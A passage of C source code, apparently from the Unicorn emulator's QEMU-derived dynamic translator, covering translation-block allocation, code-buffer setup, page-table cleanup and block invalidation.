    uc->tcg_ctx = g_malloc(sizeof(TCGContext));
    tcg_context_init(uc->tcg_ctx);
}

/* Recursively free one subtree of the multi-level l1_map page table.
   'x' is the number of table levels remaining below 'p'; when x <= 1 the
   children are leaf arrays and are freed directly. */
static void tb_clean_internal(void **p, int x)
{
    int i;
    void **q;

    if (x <= 1) {
        for (i = 0; i < V_L2_SIZE; i++) {
            q = p[i];
            if (q) {
                g_free(q);
            }
        }
        g_free(p);
    } else {
        for (i = 0; i < V_L2_SIZE; i++) {
            q = p[i];
            if (q) {
                tb_clean_internal(q, x - 1);
            }
        }
        g_free(p);
    }
}

/* Free every level of the lazily-allocated l1_map radix tree, leaving the
   level-1 slots NULL so the map could be repopulated later. */
void tb_cleanup(struct uc_struct *uc)
{
    int i, x;
    void **p;

    if (uc) {
        if (uc->l1_map) {
            /* Number of table levels hanging below each level-1 slot. */
            x = V_L1_SHIFT / V_L2_BITS;
            if (x <= 1) {
                for (i = 0; i < V_L1_SIZE; i++) {
                    p = uc->l1_map[i];
                    if (p) {
                        g_free(p);
                        uc->l1_map[i] = NULL;
                    }
                }
            } else {
                for (i = 0; i < V_L1_SIZE; i++) {
                    p = uc->l1_map[i];
                    if (p) {
                        tb_clean_internal(p, x - 1);
                        uc->l1_map[i] = NULL;
                    }
                }
            }
        }
    }
}

/* return non zero if the very first instruction is invalid so that
   the virtual CPU can trigger an exception.

   '*gen_code_size_ptr' contains the size of the generated code (host
   code). 
*/
static int cpu_gen_code(CPUArchState *env, TranslationBlock *tb, int *gen_code_size_ptr) // qq
{
    TCGContext *s = env->uc->tcg_ctx;
    tcg_insn_unit *gen_code_buf;
    int gen_code_size;
#ifdef CONFIG_PROFILER
    int64_t ti;
#endif

#ifdef CONFIG_PROFILER
    s->tb_count1++; /* includes aborted translations because of
                       exceptions */
    ti = profile_getclock();
#endif
    tcg_func_start(s);

    /* Translate the guest code of this TB into the TCG op stream. */
    gen_intermediate_code(env, tb);

    // Unicorn: when tracing block, patch block size operand for callback
    if (env->uc->size_arg != -1 && HOOK_EXISTS_BOUNDED(env->uc, UC_HOOK_BLOCK, tb->pc)) {
        if (env->uc->block_full) // block size is unknown
            *(s->gen_opparam_buf + env->uc->size_arg) = 0;
        else
            *(s->gen_opparam_buf + env->uc->size_arg) = tb->size;
    }

    /* generate machine code */
    gen_code_buf = tb->tc_ptr;
    /* NOTE(review): 0xffff appears to mark a goto_tb slot as not yet
       linked — confirm against the tb_link/goto_tb handling. */
    tb->tb_next_offset[0] = 0xffff;
    tb->tb_next_offset[1] = 0xffff;
    s->tb_next_offset = tb->tb_next_offset;
#ifdef USE_DIRECT_JUMP
    s->tb_jmp_offset = tb->tb_jmp_offset;
    s->tb_next = NULL;
#else
    s->tb_jmp_offset = NULL;
    s->tb_next = tb->tb_next;
#endif

#ifdef CONFIG_PROFILER
    s->tb_count++;
    s->interm_time += profile_getclock() - ti;
    s->code_time -= profile_getclock();
#endif
    /* Lower the op stream to host machine code; -1 means codegen failed. */
    gen_code_size = tcg_gen_code(s, gen_code_buf);
    if (gen_code_size == -1) {
        return -1;
    }
    //printf(">>> code size = %u: ", gen_code_size);
    //int i;
    //for (i = 0; i < gen_code_size; i++) {
    //    printf(" %02x", gen_code_buf[i]);
    //}
    //printf("\n");
    *gen_code_size_ptr = gen_code_size;
#ifdef CONFIG_PROFILER
    s->code_time += profile_getclock();
    s->code_in_len += tb->size;
    s->code_out_len += gen_code_size;
#endif

    return 0;
}

/* The cpu state corresponding to 'searched_pc' is restored. 
+ */ +static int cpu_restore_state_from_tb(CPUState *cpu, TranslationBlock *tb, + uintptr_t searched_pc) +{ + CPUArchState *env = cpu->env_ptr; + TCGContext *s = cpu->uc->tcg_ctx; + int j; + uintptr_t tc_ptr; +#ifdef CONFIG_PROFILER + int64_t ti; +#endif + +#ifdef CONFIG_PROFILER + ti = profile_getclock(); +#endif + tcg_func_start(s); + + gen_intermediate_code_pc(env, tb); + + /* find opc index corresponding to search_pc */ + tc_ptr = (uintptr_t)tb->tc_ptr; + if (searched_pc < tc_ptr) + return -1; + + s->tb_next_offset = tb->tb_next_offset; +#ifdef USE_DIRECT_JUMP + s->tb_jmp_offset = tb->tb_jmp_offset; + s->tb_next = NULL; +#else + s->tb_jmp_offset = NULL; + s->tb_next = tb->tb_next; +#endif + j = tcg_gen_code_search_pc(s, (tcg_insn_unit *)tc_ptr, + searched_pc - tc_ptr); + if (j < 0) + return -1; + /* now find start of instruction before */ + while (s->gen_opc_instr_start[j] == 0) { + j--; + } + cpu->icount_decr.u16.low -= s->gen_opc_icount[j]; + + restore_state_to_opc(env, tb, j); + +#ifdef CONFIG_PROFILER + s->restore_time += profile_getclock() - ti; + s->restore_count++; +#endif + return 0; +} + +bool cpu_restore_state(CPUState *cpu, uintptr_t retaddr) +{ + TranslationBlock *tb; + CPUArchState *env = cpu->env_ptr; + + tb = tb_find_pc(env->uc, retaddr); + if (tb) { + cpu_restore_state_from_tb(cpu, tb, retaddr); + return true; + } + return false; +} + +#ifdef _WIN32 +static inline QEMU_UNUSED_FUNC void map_exec(void *addr, long size) +{ + DWORD old_protect; + VirtualProtect(addr, size, + PAGE_EXECUTE_READWRITE, &old_protect); +} +#else +static inline QEMU_UNUSED_FUNC void map_exec(void *addr, long size) +{ + unsigned long start, end, page_size; + + page_size = getpagesize(); + start = (unsigned long)addr; + start &= ~(page_size - 1); + + end = (unsigned long)addr + size; + end += page_size - 1; + end &= ~(page_size - 1); + + mprotect((void *)start, end - start, + PROT_READ | PROT_WRITE | PROT_EXEC); +} +#endif + +static void page_size_init(void) +{ + /* NOTE: we 
can always suppose that qemu_host_page_size >= + TARGET_PAGE_SIZE */ + qemu_real_host_page_size = getpagesize(); + if (qemu_host_page_size == 0) { + qemu_host_page_size = qemu_real_host_page_size; + } + if (qemu_host_page_size < TARGET_PAGE_SIZE) { + qemu_host_page_size = TARGET_PAGE_SIZE; + } + qemu_host_page_mask = ~(qemu_host_page_size - 1); +} + +static void page_init(void) +{ + page_size_init(); +#if defined(CONFIG_BSD) && defined(CONFIG_USER_ONLY) + { +#ifdef HAVE_KINFO_GETVMMAP + struct kinfo_vmentry *freep; + int i, cnt; + + freep = kinfo_getvmmap(getpid(), &cnt); + if (freep) { + mmap_lock(); + for (i = 0; i < cnt; i++) { + unsigned long startaddr, endaddr; + + startaddr = freep[i].kve_start; + endaddr = freep[i].kve_end; + if (h2g_valid(startaddr)) { + startaddr = h2g(startaddr) & TARGET_PAGE_MASK; + + if (h2g_valid(endaddr)) { + endaddr = h2g(endaddr); + page_set_flags(startaddr, endaddr, PAGE_RESERVED); + } else { +#if TARGET_ABI_BITS <= L1_MAP_ADDR_SPACE_BITS + endaddr = ~0ul; + page_set_flags(startaddr, endaddr, PAGE_RESERVED); +#endif + } + } + } + free(freep); + mmap_unlock(); + } +#else + FILE *f; + + last_brk = (unsigned long)sbrk(0); + + f = fopen("/compat/linux/proc/self/maps", "r"); + if (f) { + mmap_lock(); + + do { + unsigned long startaddr, endaddr; + int n; + + n = fscanf(f, "%lx-%lx %*[^\n]\n", &startaddr, &endaddr); + + if (n == 2 && h2g_valid(startaddr)) { + startaddr = h2g(startaddr) & TARGET_PAGE_MASK; + + if (h2g_valid(endaddr)) { + endaddr = h2g(endaddr); + } else { + endaddr = ~0ul; + } + page_set_flags(startaddr, endaddr, PAGE_RESERVED); + } + } while (!feof(f)); + + fclose(f); + mmap_unlock(); + } +#endif + } +#endif +} + +static PageDesc *page_find_alloc(struct uc_struct *uc, tb_page_addr_t index, int alloc) +{ + PageDesc *pd; + void **lp; + int i; + +#if defined(CONFIG_USER_ONLY) + /* We can't use g_malloc because it may recurse into a locked mutex. 
*/ +# define ALLOC(P, SIZE) \ + do { \ + P = mmap(NULL, SIZE, PROT_READ | PROT_WRITE, \ + MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); \ + } while (0) +#else +# define ALLOC(P, SIZE) \ + do { P = g_malloc0(SIZE); } while (0) +#endif + + if (uc->l1_map == NULL) { + uc->l1_map_size = V_L1_SIZE * sizeof(uc->l1_map); + ALLOC(uc->l1_map, uc->l1_map_size); + } + + /* Level 1. Always allocated. */ + lp = uc->l1_map + ((index >> V_L1_SHIFT) & (V_L1_SIZE - 1)); + + /* Level 2..N-1. */ + for (i = V_L1_SHIFT / V_L2_BITS - 1; i > 0; i--) { + void **p = *lp; + + if (p == NULL) { + if (!alloc) { + return NULL; + } + ALLOC(p, sizeof(void *) * V_L2_SIZE); + *lp = p; + } + + lp = p + ((index >> (i * V_L2_BITS)) & (V_L2_SIZE - 1)); + } + + pd = *lp; + if (pd == NULL) { + if (!alloc) { + return NULL; + } + ALLOC(pd, sizeof(PageDesc) * V_L2_SIZE); + *lp = pd; + } + +#undef ALLOC + + return pd + (index & (V_L2_SIZE - 1)); +} + +static inline PageDesc *page_find(struct uc_struct *uc, tb_page_addr_t index) +{ + return page_find_alloc(uc, index, 0); +} + +#if !defined(CONFIG_USER_ONLY) +#define mmap_lock() do { } while (0) +#define mmap_unlock() do { } while (0) +#endif + +#if defined(CONFIG_USER_ONLY) +/* Currently it is not recommended to allocate big chunks of data in + user mode. It will change when a dedicated libc will be used. */ +/* ??? 64-bit hosts ought to have no problem mmaping data outside the + region in which the guest needs to run. Revisit this. */ +#define USE_STATIC_CODE_GEN_BUFFER +#endif + +/* ??? Should configure for this, not list operating systems here. */ +#if (defined(__linux__) \ + || defined(__FreeBSD__) || defined(__FreeBSD_kernel__) \ + || defined(__DragonFly__) || defined(__OpenBSD__) \ + || defined(__NetBSD__)) +# define USE_MMAP +#endif + +/* Minimum size of the code gen buffer. This number is randomly chosen, + but not so small that we can't have a fair number of TB's live. 
*/ +#define MIN_CODE_GEN_BUFFER_SIZE (1024u * 1024) + +/* Maximum size of the code gen buffer we'd like to use. Unless otherwise + indicated, this is constrained by the range of direct branches on the + host cpu, as used by the TCG implementation of goto_tb. */ +#if defined(__x86_64__) +# define MAX_CODE_GEN_BUFFER_SIZE (2ul * 1024 * 1024 * 1024) +#elif defined(__sparc__) +# define MAX_CODE_GEN_BUFFER_SIZE (2ul * 1024 * 1024 * 1024) +#elif defined(__aarch64__) +# define MAX_CODE_GEN_BUFFER_SIZE (128ul * 1024 * 1024) +#elif defined(__arm__) +# define MAX_CODE_GEN_BUFFER_SIZE (16u * 1024 * 1024) +#elif defined(__s390x__) + /* We have a +- 4GB range on the branches; leave some slop. */ +# define MAX_CODE_GEN_BUFFER_SIZE (3ul * 1024 * 1024 * 1024) +#elif defined(__mips__) + /* We have a 256MB branch region, but leave room to make sure the + main executable is also within that region. */ +# define MAX_CODE_GEN_BUFFER_SIZE (128ul * 1024 * 1024) +#else +# define MAX_CODE_GEN_BUFFER_SIZE ((size_t)-1) +#endif + +#define DEFAULT_CODE_GEN_BUFFER_SIZE_1 (8 * 1024 * 1024) + +#define DEFAULT_CODE_GEN_BUFFER_SIZE \ + (DEFAULT_CODE_GEN_BUFFER_SIZE_1 < MAX_CODE_GEN_BUFFER_SIZE \ + ? DEFAULT_CODE_GEN_BUFFER_SIZE_1 : MAX_CODE_GEN_BUFFER_SIZE) + +static inline size_t size_code_gen_buffer(struct uc_struct *uc, size_t tb_size) +{ + TCGContext *tcg_ctx = uc->tcg_ctx; + + /* Size the buffer. */ + if (tb_size == 0) { +#ifdef USE_STATIC_CODE_GEN_BUFFER + tb_size = DEFAULT_CODE_GEN_BUFFER_SIZE; +#else + /* ??? Needs adjustments. */ + /* ??? If we relax the requirement that CONFIG_USER_ONLY use the + static buffer, we could size this on RESERVED_VA, on the text + segment size of the executable, or continue to use the default. 
*/ + tb_size = (unsigned long)DEFAULT_CODE_GEN_BUFFER_SIZE; +#endif + } + if (tb_size < MIN_CODE_GEN_BUFFER_SIZE) { + tb_size = MIN_CODE_GEN_BUFFER_SIZE; + } + if (tb_size > MAX_CODE_GEN_BUFFER_SIZE) { + tb_size = MAX_CODE_GEN_BUFFER_SIZE; + } + tcg_ctx->code_gen_buffer_size = tb_size; + return tb_size; +} + +#ifdef __mips__ +/* In order to use J and JAL within the code_gen_buffer, we require + that the buffer not cross a 256MB boundary. */ +static inline bool cross_256mb(void *addr, size_t size) +{ + return ((uintptr_t)addr ^ ((uintptr_t)addr + size)) & 0xf0000000; +} + +/* We weren't able to allocate a buffer without crossing that boundary, + so make do with the larger portion of the buffer that doesn't cross. + Returns the new base of the buffer, and adjusts code_gen_buffer_size. */ +static inline void *split_cross_256mb(struct uc_struct *uc, void *buf1, size_t size1) +{ + void *buf2 = (void *)(((uintptr_t)buf1 + size1) & 0xf0000000); + size_t size2 = buf1 + size1 - buf2; + TCGContext *tcg_ctx = uc->tcg_ctx; + + size1 = buf2 - buf1; + if (size1 < size2) { + size1 = size2; + buf1 = buf2; + } + + tcg_ctx->code_gen_buffer_size = size1; + return buf1; +} +#endif + +#ifdef USE_STATIC_CODE_GEN_BUFFER +static uint8_t QEMU_ALIGN(CODE_GEN_ALIGN, static_code_gen_buffer[DEFAULT_CODE_GEN_BUFFER_SIZE]); + +void free_code_gen_buffer(struct uc_struct *uc) +{ + // Do nothing, we use a static buffer. 
+} + +static inline void *alloc_code_gen_buffer(struct uc_struct *uc) +{ + TCGContext *tcg_ctx = uc->tcg_ctx; + void *buf = static_code_gen_buffer; +#ifdef __mips__ + if (cross_256mb(buf, tcg_ctx->code_gen_buffer_size)) { + buf = split_cross_256mb(buf, tcg_ctx->code_gen_buffer_size); + } +#endif + map_exec(buf, tcg_ctx->code_gen_buffer_size); + return buf; +} +#elif defined(USE_MMAP) +void free_code_gen_buffer(struct uc_struct *uc) +{ + TCGContext *tcg_ctx = uc->tcg_ctx; + if (tcg_ctx->code_gen_buffer) + munmap(tcg_ctx->code_gen_buffer, tcg_ctx->code_gen_buffer_size); +} + +static inline void *alloc_code_gen_buffer(struct uc_struct *uc) +{ + int flags = MAP_PRIVATE | MAP_ANONYMOUS; + uintptr_t start = 0; + void *buf; + TCGContext *tcg_ctx = uc->tcg_ctx; + + /* Constrain the position of the buffer based on the host cpu. + Note that these addresses are chosen in concert with the + addresses assigned in the relevant linker script file. */ +# if defined(__PIE__) || defined(__PIC__) + /* Don't bother setting a preferred location if we're building + a position-independent executable. We're more likely to get + an address near the main executable if we let the kernel + choose the address. */ +# elif defined(__x86_64__) && defined(MAP_32BIT) + /* Force the memory down into low memory with the executable. + Leave the choice of exact location with the kernel. */ + flags |= MAP_32BIT; + /* Cannot expect to map more than 800MB in low memory. */ + if (tcg_ctx->code_gen_buffer_size > 800u * 1024 * 1024) { + tcg_ctx->code_gen_buffer_size = 800u * 1024 * 1024; + } +# elif defined(__sparc__) + start = 0x40000000ul; +# elif defined(__s390x__) + start = 0x90000000ul; +# elif defined(__mips__) + /* ??? We ought to more explicitly manage layout for softmmu too. 
*/ +# ifdef CONFIG_USER_ONLY + start = 0x68000000ul; +# elif _MIPS_SIM == _ABI64 + start = 0x128000000ul; +# else + start = 0x08000000ul; +# endif +# endif + + buf = mmap((void *)start, tcg_ctx->code_gen_buffer_size, + PROT_WRITE | PROT_READ | PROT_EXEC, flags, -1, 0); + if (buf == MAP_FAILED) { + return NULL; + } + +#ifdef __mips__ + if (cross_256mb(buf, tcg_ctx->code_gen_buffer_size)) { + /* Try again, with the original still mapped, to avoid re-acquiring + that 256mb crossing. This time don't specify an address. */ + size_t size2, size1 = tcg_ctx->code_gen_buffer_size; + void *buf2 = mmap(NULL, size1, PROT_WRITE | PROT_READ | PROT_EXEC, + flags, -1, 0); + if (buf2 != MAP_FAILED) { + if (!cross_256mb(buf2, size1)) { + /* Success! Use the new buffer. */ + munmap(buf, size1); + return buf2; + } + /* Failure. Work with what we had. */ + munmap(buf2, size1); + } + + /* Split the original buffer. Free the smaller half. */ + buf2 = split_cross_256mb(buf, size1); + size2 = tcg_ctx->code_gen_buffer_size; + munmap(buf + (buf == buf2 ? size2 : 0), size1 - size2); + return buf2; + } +#endif + + return buf; +} +#else +void free_code_gen_buffer(struct uc_struct *uc) +{ + TCGContext *tcg_ctx = uc->tcg_ctx; + if (tcg_ctx->code_gen_buffer) + g_free(tcg_ctx->code_gen_buffer); +} + +static inline void *alloc_code_gen_buffer(struct uc_struct *uc) +{ + TCGContext *tcg_ctx = uc->tcg_ctx; + void *buf = g_malloc(tcg_ctx->code_gen_buffer_size); + + if (buf == NULL) { + return NULL; + } + +#ifdef __mips__ + if (cross_256mb(buf, tcg_ctx->code_gen_buffer_size)) { + void *buf2 = g_malloc(tcg_ctx->code_gen_buffer_size); + if (buf2 != NULL && !cross_256mb(buf2, size1)) { + /* Success! Use the new buffer. */ + free(buf); + buf = buf2; + } else { + /* Failure. Work with what we had. Since this is malloc + and not mmap, we can't free the other half. 
*/ + free(buf2); + buf = split_cross_256mb(buf, tcg_ctx->code_gen_buffer_size); + } + } +#endif + + map_exec(buf, tcg_ctx->code_gen_buffer_size); + return buf; +} +#endif /* USE_STATIC_CODE_GEN_BUFFER, USE_MMAP */ + +static inline void code_gen_alloc(struct uc_struct *uc, size_t tb_size) +{ + TCGContext *tcg_ctx = uc->tcg_ctx; + + tcg_ctx->code_gen_buffer_size = size_code_gen_buffer(uc, tb_size); + tcg_ctx->code_gen_buffer = alloc_code_gen_buffer(uc); + if (tcg_ctx->code_gen_buffer == NULL) { + fprintf(stderr, "Could not allocate dynamic translator buffer\n"); + exit(1); + } + + //qemu_madvise(tcg_ctx.code_gen_buffer, tcg_ctx.code_gen_buffer_size, + // QEMU_MADV_HUGEPAGE); + + /* Steal room for the prologue at the end of the buffer. This ensures + (via the MAX_CODE_GEN_BUFFER_SIZE limits above) that direct branches + from TB's to the prologue are going to be in range. It also means + that we don't need to mark (additional) portions of the data segment + as executable. */ + tcg_ctx->code_gen_prologue = (char*)tcg_ctx->code_gen_buffer + + tcg_ctx->code_gen_buffer_size - 1024; + tcg_ctx->code_gen_buffer_size -= 1024; + + tcg_ctx->code_gen_buffer_max_size = tcg_ctx->code_gen_buffer_size - + (TCG_MAX_OP_SIZE * OPC_BUF_SIZE); + tcg_ctx->code_gen_max_blocks = tcg_ctx->code_gen_buffer_size / + CODE_GEN_AVG_BLOCK_SIZE; + tcg_ctx->tb_ctx.tbs = + g_malloc(tcg_ctx->code_gen_max_blocks * sizeof(TranslationBlock)); +} + +/* Must be called before using the QEMU cpus. 'tb_size' is the size + (in bytes) allocated to the translation buffer. Zero means default + size. */ +void tcg_exec_init(struct uc_struct *uc, unsigned long tb_size) +{ + TCGContext *tcg_ctx; + + cpu_gen_init(uc); + code_gen_alloc(uc, tb_size); + tcg_ctx = uc->tcg_ctx; + tcg_ctx->code_gen_ptr = tcg_ctx->code_gen_buffer; + tcg_ctx->uc = uc; + page_init(); +#if !defined(CONFIG_USER_ONLY) || !defined(CONFIG_USE_GUEST_BASE) + /* There's no guest base to take into account, so go ahead and + initialize the prologue now. 
*/ + tcg_prologue_init(tcg_ctx); +#endif +} + +bool tcg_enabled(struct uc_struct *uc) +{ + TCGContext *tcg_ctx = uc->tcg_ctx; + return tcg_ctx->code_gen_buffer != NULL; +} + +/* Allocate a new translation block. Flush the translation buffer if + too many translation blocks or too much generated code. */ +static TranslationBlock *tb_alloc(struct uc_struct *uc, target_ulong pc) +{ + TranslationBlock *tb; + TCGContext *tcg_ctx = uc->tcg_ctx; + + if (tcg_ctx->tb_ctx.nb_tbs >= tcg_ctx->code_gen_max_blocks || + (size_t)(((char*)tcg_ctx->code_gen_ptr - (char*)tcg_ctx->code_gen_buffer)) >= + tcg_ctx->code_gen_buffer_max_size) { + return NULL; + } + tb = &tcg_ctx->tb_ctx.tbs[tcg_ctx->tb_ctx.nb_tbs++]; + tb->pc = pc; + tb->cflags = 0; + return tb; +} + +void tb_free(struct uc_struct *uc, TranslationBlock *tb) +{ + TCGContext *tcg_ctx = uc->tcg_ctx; + + /* In practice this is mostly used for single use temporary TB + Ignore the hard cases and just back up if this TB happens to + be the last one generated. */ + if (tcg_ctx->tb_ctx.nb_tbs > 0 && + tb == &tcg_ctx->tb_ctx.tbs[tcg_ctx->tb_ctx.nb_tbs - 1]) { + tcg_ctx->code_gen_ptr = tb->tc_ptr; + tcg_ctx->tb_ctx.nb_tbs--; + } +} + +static inline void invalidate_page_bitmap(PageDesc *p) +{ + if (p->code_bitmap) { + g_free(p->code_bitmap); + p->code_bitmap = NULL; + } + p->code_write_count = 0; +} + +/* Set to NULL all the 'first_tb' fields in all PageDescs. 
*/ +static void page_flush_tb_1(int level, void **lp) +{ + int i; + + if (*lp == NULL) { + return; + } + if (level == 0) { + PageDesc *pd = *lp; + + for (i = 0; i < V_L2_SIZE; ++i) { + pd[i].first_tb = NULL; + invalidate_page_bitmap(pd + i); + } + } else { + void **pp = *lp; + + for (i = 0; i < V_L2_SIZE; ++i) { + page_flush_tb_1(level - 1, pp + i); + } + } +} + +static void page_flush_tb(struct uc_struct *uc) +{ + int i; + + if (uc->l1_map == NULL) + return; + + for (i = 0; i < V_L1_SIZE; i++) { + page_flush_tb_1(V_L1_SHIFT / V_L2_BITS - 1, uc->l1_map + i); + } +} + +/* flush all the translation blocks */ +/* XXX: tb_flush is currently not thread safe */ +void tb_flush(CPUArchState *env1) +{ + CPUState *cpu = ENV_GET_CPU(env1); + struct uc_struct* uc = cpu->uc; + TCGContext *tcg_ctx = uc->tcg_ctx; + +#if defined(DEBUG_FLUSH) + printf("qemu: flush code_size=%ld nb_tbs=%d avg_tb_size=%ld\n", + (unsigned long)(tcg_ctx->code_gen_ptr - tcg_ctx->code_gen_buffer), + tcg_ctx->tb_ctx.nb_tbs, tcg_ctx->tb_ctx.nb_tbs > 0 ? 
+ ((unsigned long)(tcg_ctx->code_gen_ptr - tcg_ctx->code_gen_buffer)) / + tcg_ctx->tb_ctx.nb_tbs : 0); +#endif + if ((unsigned long)((char*)tcg_ctx->code_gen_ptr - (char*)tcg_ctx->code_gen_buffer) + > tcg_ctx->code_gen_buffer_size) { + cpu_abort(cpu, "Internal error: code buffer overflow\n"); + } + tcg_ctx->tb_ctx.nb_tbs = 0; + + memset(cpu->tb_jmp_cache, 0, sizeof(cpu->tb_jmp_cache)); + + memset(tcg_ctx->tb_ctx.tb_phys_hash, 0, sizeof(tcg_ctx->tb_ctx.tb_phys_hash)); + page_flush_tb(uc); + + tcg_ctx->code_gen_ptr = tcg_ctx->code_gen_buffer; + /* XXX: flush processor icache at this point if cache flush is + expensive */ + tcg_ctx->tb_ctx.tb_flush_count++; +} + +#ifdef DEBUG_TB_CHECK + +static void tb_invalidate_check(target_ulong address) +{ + TranslationBlock *tb; + int i; + + address &= TARGET_PAGE_MASK; + for (i = 0; i < CODE_GEN_PHYS_HASH_SIZE; i++) { + for (tb = tb_ctx.tb_phys_hash[i]; tb != NULL; tb = tb->phys_hash_next) { + if (!(address + TARGET_PAGE_SIZE <= tb->pc || + address >= tb->pc + tb->size)) { + printf("ERROR invalidate: address=" TARGET_FMT_lx + " PC=%08lx size=%04x\n", + address, (long)tb->pc, tb->size); + } + } + } +} + +/* verify that all the pages have correct rights for code */ +static void tb_page_check(struct uc_struct *uc) +{ + TranslationBlock *tb; + int i, flags1, flags2; + TCGContext *tcg_ctx = uc->tcg_ctx; + + for (i = 0; i < CODE_GEN_PHYS_HASH_SIZE; i++) { + for (tb = tcg_ctx->tb_ctx.tb_phys_hash[i]; tb != NULL; + tb = tb->phys_hash_next) { + flags1 = page_get_flags(tb->pc); + flags2 = page_get_flags(tb->pc + tb->size - 1); + if ((flags1 & PAGE_WRITE) || (flags2 & PAGE_WRITE)) { + printf("ERROR page flags: PC=%08lx size=%04x f1=%x f2=%x\n", + (long)tb->pc, tb->size, flags1, flags2); + } + } + } +} + +#endif + +static inline void tb_hash_remove(TranslationBlock **ptb, TranslationBlock *tb) +{ + TranslationBlock *tb1; + + for (;;) { + tb1 = *ptb; + if (tb1 == tb) { + *ptb = tb1->phys_hash_next; + break; + } + ptb = &tb1->phys_hash_next; 
+ } +} + +static inline void tb_page_remove(TranslationBlock **ptb, TranslationBlock *tb) +{ + TranslationBlock *tb1; + unsigned int n1; + + for (;;) { + tb1 = *ptb; + n1 = (uintptr_t)tb1 & 3; + tb1 = (TranslationBlock *)((uintptr_t)tb1 & ~3); + if (tb1 == tb) { + *ptb = tb1->page_next[n1]; + break; + } + ptb = &tb1->page_next[n1]; + } +} + +static inline void tb_jmp_remove(TranslationBlock *tb, int n) +{ + TranslationBlock *tb1, **ptb; + unsigned int n1; + + ptb = &tb->jmp_next[n]; + tb1 = *ptb; + if (tb1) { + /* find tb(n) in circular list */ + for (;;) { + tb1 = *ptb; + n1 = (uintptr_t)tb1 & 3; + tb1 = (TranslationBlock *)((uintptr_t)tb1 & ~3); + if (n1 == n && tb1 == tb) { + break; + } + if (n1 == 2) { + ptb = &tb1->jmp_first; + } else { + ptb = &tb1->jmp_next[n1]; + } + } + /* now we can suppress tb(n) from the list */ + *ptb = tb->jmp_next[n]; + + tb->jmp_next[n] = NULL; + } +} + +/* reset the jump entry 'n' of a TB so that it is not chained to + another TB */ +static inline void tb_reset_jump(TranslationBlock *tb, int n) +{ + tb_set_jmp_target(tb, n, (uintptr_t)((char*)tb->tc_ptr + tb->tb_next_offset[n])); +} + +/* invalidate one TB */ +void tb_phys_invalidate(struct uc_struct *uc, + TranslationBlock *tb, tb_page_addr_t page_addr) +{ + TCGContext *tcg_ctx = uc->tcg_ctx; + CPUState *cpu = uc->cpu; + PageDesc *p; + unsigned int h, n1; + tb_page_addr_t phys_pc; + TranslationBlock *tb1, *tb2; + + /* remove the TB from the hash list */ + phys_pc = tb->page_addr[0] + (tb->pc & ~TARGET_PAGE_MASK); + h = tb_phys_hash_func(phys_pc); + tb_hash_remove(&tcg_ctx->tb_ctx.tb_phys_hash[h], tb); + + /* remove the TB from the page list */ + if (tb->page_addr[0] != page_addr) { + p = page_find(uc, tb->page_addr[0] >> TARGET_PAGE_BITS); + tb_page_remove(&p->first_tb, tb); + invalidate_page_bitmap(p); + } + if (tb->page_addr[1] != -1 && tb->page_addr[1] != page_addr) { + p = page_find(uc, tb->page_addr[1] >> TARGET_PAGE_BITS); + tb_page_remove(&p->first_tb, tb); + 
invalidate_page_bitmap(p); + } + + tcg_ctx->tb_ctx.tb_invalidated_flag = 1; + + /* remove the TB from the hash list */ + h = tb_jmp_cache_hash_func(tb->pc); + if (cpu->tb_jmp_cache[h] == tb) { + cpu->tb_jmp_cache[h] = NULL; + } + + /* suppress this TB from the two jump lists */ + tb_jmp_remove(tb, 0); + tb_jmp_remove(tb, 1); + + /* suppress any remaining jumps to this TB */ + tb1 = tb->jmp_first; + for (;;) { + n1 = (uintptr_t)tb1 & 3; + if (n1 == 2) { + break; + } + tb1 = (TranslationBlock *)((uintptr_t)tb1 & ~3); + tb2 = tb1->jmp_next[n1]; + tb_reset_jump(tb1, n1); + tb1->jmp_next[n1] = NULL; + tb1 = tb2; + } + tb->jmp_first = (TranslationBlock *)((uintptr_t)tb | 2); /* fail safe */ + + tcg_ctx->tb_ctx.tb_phys_invalidate_count++; +} + +static inline void set_bits(uint8_t *tab, int start, int len) +{ + int end, mask, end1; + + end = start + len; + tab += start >> 3; + mask = 0xff << (start & 7); + if ((start & ~7) == (end & ~7)) { + if (start < end) { + mask &= ~(0xff << (end & 7)); + *tab |= mask; + } + } else { + *tab++ |= mask; + start = (start + 8) & ~7; + end1 = end & ~7; + while (start < end1) { + *tab++ = 0xff; + start += 8; + } + if (start < end) { + mask = ~(0xff << (end & 7)); + *tab |= mask; + } + } +} + +static void build_page_bitmap(PageDesc *p) +{ + int n, tb_start, tb_end; + TranslationBlock *tb; + + p->code_bitmap = g_malloc0(TARGET_PAGE_SIZE / 8); + + tb = p->first_tb; + while (tb != NULL) { + n = (uintptr_t)tb & 3; + tb = (TranslationBlock *)((uintptr_t)tb & ~3); + /* NOTE: this is subtle as a TB may span two physical pages */ + if (n == 0) { + /* NOTE: tb_end may be after the end of the page, but + it is not a problem */ + tb_start = tb->pc & ~TARGET_PAGE_MASK; + tb_end = tb_start + tb->size; + if (tb_end > TARGET_PAGE_SIZE) { + tb_end = TARGET_PAGE_SIZE; + } + } else { + tb_start = 0; + tb_end = ((tb->pc + tb->size) & ~TARGET_PAGE_MASK); + } + set_bits(p->code_bitmap, tb_start, tb_end - tb_start); + tb = tb->page_next[n]; + } +} + 
+TranslationBlock *tb_gen_code(CPUState *cpu, + target_ulong pc, target_ulong cs_base, + int flags, int cflags) // qq +{ + CPUArchState *env = cpu->env_ptr; + TCGContext *tcg_ctx = env->uc->tcg_ctx; + TranslationBlock *tb; + tb_page_addr_t phys_pc, phys_page2; + int code_gen_size; + int ret; + + phys_pc = get_page_addr_code(env, pc); + tb = tb_alloc(env->uc, pc); + if (!tb) { + /* flush must be done */ + tb_flush(env); + /* cannot fail at this point */ + tb = tb_alloc(env->uc, pc); + /* Don't forget to invalidate previous TB info. */ + tcg_ctx->tb_ctx.tb_invalidated_flag = 1; + } + tb->tc_ptr = tcg_ctx->code_gen_ptr; + tb->cs_base = cs_base; + tb->flags = flags; + tb->cflags = cflags; + ret = cpu_gen_code(env, tb, &code_gen_size); // qq + if (ret == -1) { + tb_free(env->uc, tb); + return NULL; + } + tcg_ctx->code_gen_ptr = (void *)(((uintptr_t)tcg_ctx->code_gen_ptr + + code_gen_size + CODE_GEN_ALIGN - 1) & ~(CODE_GEN_ALIGN - 1)); + + phys_page2 = -1; + /* check next page if needed */ + if (tb->size) { + target_ulong virt_page2 = (pc + tb->size - 1) & TARGET_PAGE_MASK; + if ((pc & TARGET_PAGE_MASK) != virt_page2) { + phys_page2 = get_page_addr_code(env, virt_page2); + } + } + tb_link_page(cpu->uc, tb, phys_pc, phys_page2); + return tb; +} + +/* + * Invalidate 